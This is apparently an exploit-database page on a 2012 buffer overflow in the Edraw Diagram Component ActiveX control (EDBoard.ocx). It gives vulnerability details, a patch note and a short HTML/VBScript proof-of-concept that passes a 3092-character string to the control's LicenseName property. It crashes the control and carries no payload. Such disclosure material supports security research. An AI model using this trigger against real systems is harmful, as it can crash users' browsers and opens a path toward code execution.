header-logo
Suggest Exploit
vendor:
Edraw Diagram Component
by:
Senator of Pirates
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Edraw Diagram Component
Affected Version From: Edraw Diagram Component 5
Affected Version To: Other versions may also be affected.
Patch Exists: Yes
Related CWE: N/A
CPE: a:edrawsoft:edraw_diagram_component
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 EN
2012

Edraw Diagram Component ActiveX Control Remote Buffer Overflow Vulnerability

Edraw Diagram Component ActiveX control ('EDBoard.ocx') is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code in the context of the application, usually Internet Explorer, using the ActiveX control. Failed attacks will likely cause denial-of-service conditions.

Mitigation:

Apply the latest security patches and updates from the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/51866/info

Edraw Diagram Component ActiveX control ('EDBoard.ocx') is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

An attacker can exploit this issue to execute arbitrary code in the context of the application, usually Internet Explorer, using the ActiveX control. Failed attacks will likely cause denial-of-service conditions.

Edraw Diagram Component 5 is vulnerable; other versions may also be affected. 

Author : Senator of Pirates
This exploit tested on Windows Xp SP3 EN
http://www.edrawsoft.com/download/EDBoardSetup.exe
--------------------------------------------------------------------------------------------------------
<object
classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' /> <script language='vbscript'>targetFile = "C:\Program Files\edboard\EDBoard.ocx"
prototype  = "Invoke_Unknown LicenseName As String"
memberName = "LicenseName"
progid     = "EDBoardLib.EDBoard"
argCount   = 1
arg1=String(3092, "A")
target.LicenseName = arg1</script>